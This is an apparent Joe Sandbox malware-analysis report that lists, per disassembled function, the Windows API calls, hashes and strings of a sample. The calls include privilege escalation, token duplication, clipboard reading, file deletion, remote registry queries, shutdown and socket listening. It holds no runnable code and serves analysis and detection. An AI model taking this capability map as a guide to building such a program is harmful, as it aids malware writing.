                                                                    • Opcode Fuzzy Hash: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
                                                                    • Instruction Fuzzy Hash: F73154B2E54218BBEB206BB55C4AFBF7E6CEB44B50F100469F605EA1D1C6B15D40BE60
                                                                    APIs
                                                                      • Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                      • Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                      • Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A
                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00941286
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009412A8
                                                                    • CloseHandle.KERNEL32(?), ref: 009412B9
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009412D1
                                                                    • GetProcessWindowStation.USER32 ref: 009412EA
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 009412F4
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00941310
                                                                      • Part of subcall function 009410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
                                                                      • Part of subcall function 009410BF: CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 22674027-1027155976
                                                                    • Opcode ID: b3cb13863f2ea7eb66fc1848e527e9765101f0f6477c339c27aa9520c1c2d868
                                                                    • Instruction ID: 58698ff75fdb97ed078b3c8e341eb587243f3ff4aff9026a33b1df1472d30973
                                                                    • Opcode Fuzzy Hash: b3cb13863f2ea7eb66fc1848e527e9765101f0f6477c339c27aa9520c1c2d868
                                                                    • Instruction Fuzzy Hash: 00819AB2A00209AFDF209FA4DC49FEE7BBDEF44704F144129FA14E62A0D7349984DB65
                                                                    APIs
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                      • Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                      • Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                      • Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940BCC
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940C00
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940C17
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00940C51
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940C6D
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940C84
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940C8C
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00940C93
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940CB4
                                                                    • CopySid.ADVAPI32(00000000), ref: 00940CBB
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940CEA
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940D0C
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940D1E
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D45
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D4C
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D55
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D5C
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D65
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D6C
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00940D78
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940D7F
                                                                      • Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
                                                                      • Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
                                                                      • Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
                                                                    • Instruction ID: bd1159240d0415ea3bd1097e988bec0e61d8e110279b4679fb9d4f49d495d3cf
                                                                    • Opcode Fuzzy Hash: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
                                                                    • Instruction Fuzzy Hash: 44716EB290420AABDF10DFE4DC45FAEBBBCBF84300F044529EA18A7191D771A945CBA0
                                                                    APIs
                                                                    • OpenClipboard.USER32(0097CC08), ref: 0095EB29
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0095EB37
                                                                    • GetClipboardData.USER32(0000000D), ref: 0095EB43
                                                                    • CloseClipboard.USER32 ref: 0095EB4F
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0095EB87
                                                                    • CloseClipboard.USER32 ref: 0095EB91
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0095EBBC
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0095EBC9
                                                                    • GetClipboardData.USER32(00000001), ref: 0095EBD1
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0095EBE2
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0095EC22
                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0095EC38
                                                                    • GetClipboardData.USER32(0000000F), ref: 0095EC44
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0095EC55
                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0095EC77
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095EC94
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095ECD2
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0095ECF3
                                                                    • CountClipboardFormats.USER32 ref: 0095ED14
                                                                    • CloseClipboard.USER32 ref: 0095ED59
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                    • String ID:
                                                                    • API String ID: 420908878-0
                                                                    • Opcode ID: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
                                                                    • Instruction ID: aeede31ff343e18d112ee79684afe52225fe84e8a679869ef18ae32dbe32cce2
                                                                    • Opcode Fuzzy Hash: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
                                                                    • Instruction Fuzzy Hash: 7761D1752082029FD304EF26D889F2A77A8FF84705F14451DF85AC72A2DB72DE49DB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009569BE
                                                                    • FindClose.KERNEL32(00000000), ref: 00956A12
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A4E
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A75
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00956AB2
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00956ADF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                    • API String ID: 3830820486-3289030164
                                                                    • Opcode ID: 7cecf4b84e751917be0963f7198a373aed9ef64537de33859dced6f7fbe21b89
                                                                    • Instruction ID: d0fe218a08402e98e54c4fbe6c4ce9498ea3d8539b023c952c8c45a03cdc0d86
                                                                    • Opcode Fuzzy Hash: 7cecf4b84e751917be0963f7198a373aed9ef64537de33859dced6f7fbe21b89
                                                                    • Instruction Fuzzy Hash: 30D13E72508340AAC710EBA5C882EABB7ECFF99704F44491DF995C7191EB74DA48CB63
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00959663
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009596A1
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 009596BB
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009596D3
                                                                    • FindClose.KERNEL32(00000000), ref: 009596DE
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009596FA
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0095974A
                                                                    • SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 00959768
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00959772
                                                                    • FindClose.KERNEL32(00000000), ref: 0095977F
                                                                    • FindClose.KERNEL32(00000000), ref: 0095978F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
                                                                    • Instruction ID: 61c15a592e8d60cc891b812a3733ed554f0df105fecf5787d3edd42ab2b228c2
                                                                    • Opcode Fuzzy Hash: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
                                                                    • Instruction Fuzzy Hash: 3D311772505209AEEF10EFB5EC08ADE37AC9F49321F14405AFC18E2190DB30DE888F60
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009597BE
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00959819
                                                                    • FindClose.KERNEL32(00000000), ref: 00959824
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00959840
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00959890
                                                                    • SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 009598AE
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009598B8
                                                                    • FindClose.KERNEL32(00000000), ref: 009598C5
                                                                    • FindClose.KERNEL32(00000000), ref: 009598D5
                                                                      • Part of subcall function 0094DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0094DB00
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
                                                                    • Instruction ID: 1257e51883a36b248935a73b589cce0ecf9f4c96ab5c2d0f26f4b80fb805df6b
                                                                    • Opcode Fuzzy Hash: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
                                                                    • Instruction Fuzzy Hash: 7131F272505219AEEF10EFB5EC48ADE37ACDF46325F144169ED18A21D0DB30DA88DB60
                                                                    APIs
                                                                      • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BF3E
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0096BFA9
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096BFCD
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0096C02C
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0096C0E7
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0096C154
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0096C1E9
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0096C23A
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0096C2E3
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096C382
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096C38F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3102970594-0
                                                                    • Opcode ID: e3d3ebaf9c26f8c79d123025a70c8f0b1987b948a650772a5cf965190f23d14a
                                                                    • Instruction ID: 1ecb53039ad652cecace156bfce261b038401b4b25e9819ec0497bc04eb89ba9
                                                                    • Opcode Fuzzy Hash: e3d3ebaf9c26f8c79d123025a70c8f0b1987b948a650772a5cf965190f23d14a
                                                                    • Instruction Fuzzy Hash: ED024EB16042409FD714DF28C895E2ABBE9FF89314F18849DF889CB2A2D731ED45CB52
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00958257
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00958267
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00958273
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00958310
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958324
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958356
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0095838C
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958395
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                    • String ID: *.*
                                                                    • API String ID: 1464919966-438819550
                                                                    • Opcode ID: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
                                                                    • Instruction ID: fe86fd0136d3b3caff69ae62a39e36bc13888ff4eec0f2cffc49f6b1955d1b1c
                                                                    • Opcode Fuzzy Hash: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
                                                                    • Instruction Fuzzy Hash: 166148B25082459FCB10EF65C841AAFB3E8FF89311F04891DF999D7251EB31E949CB92
                                                                    APIs
                                                                      • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                      • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0094D122
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0094D1DD
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0094D1F0
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D20D
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D237
                                                                      • Part of subcall function 0094D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0094D21C,?,?), ref: 0094D2B2
                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 0094D253
                                                                    • FindClose.KERNEL32(00000000), ref: 0094D264
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 1946585618-1173974218
                                                                    • Opcode ID: 56e7ccfd4604ca7d6317e1eb2eeca26aedf71a221eac68d2e049f5ea17420c00
                                                                    • Instruction ID: 9aa138841782d6cb4f6b09ad55bbc5772ccfb941b4e7981522fe7390f99076ba
                                                                    • Opcode Fuzzy Hash: 56e7ccfd4604ca7d6317e1eb2eeca26aedf71a221eac68d2e049f5ea17420c00
                                                                    • Instruction Fuzzy Hash: 32619C3180614DABCF15EBA5C992DEDB7B9FF56300F204069E411B31A2EB70AF49CB61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
                                                                    • Instruction ID: 8ae45932bf481318f40f3bb625d5550797d6e12853f80dbf6385ffd365c7a9c9
                                                                    • Opcode Fuzzy Hash: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
                                                                    • Instruction Fuzzy Hash: 694103716182119FD714CF16D889F19BBE4FF44319F04C09DE8298B6A2C736ED85CB80
                                                                    APIs
                                                                      • Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                      • Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                      • Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0094E932
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-3163812486
                                                                    • Opcode ID: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
                                                                    • Instruction ID: d274e782141dea60f94e6ab9bbc07305002e33046d14ea4f7fa461e5ed0b6a96
                                                                    • Opcode Fuzzy Hash: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
                                                                    • Instruction Fuzzy Hash: A401F973725211AFEB6426B49C86FBF729CB754790F150825FC13E21D2D6A59C809294
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00961276
                                                                    • WSAGetLastError.WSOCK32 ref: 00961283
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 009612BA
                                                                    • WSAGetLastError.WSOCK32 ref: 009612C5
                                                                    • closesocket.WSOCK32(00000000), ref: 009612F4
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00961303
                                                                    • WSAGetLastError.WSOCK32 ref: 0096130D
                                                                    • closesocket.WSOCK32(00000000), ref: 0096133C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                    • String ID:
                                                                    • API String ID: 540024437-0
                                                                    • Opcode ID: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
                                                                    • Instruction ID: d2a99820dc33a1f673082c0d6aa6f471ecb61fa5986a9fabbc31465667e22e4d
                                                                    • Opcode Fuzzy Hash: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
                                                                    • Instruction Fuzzy Hash: 7C417F71A001409FD710DF68C498B6ABBE5BF46318F1C819CE8669F296C771ED81CBA1
                                                                    APIs
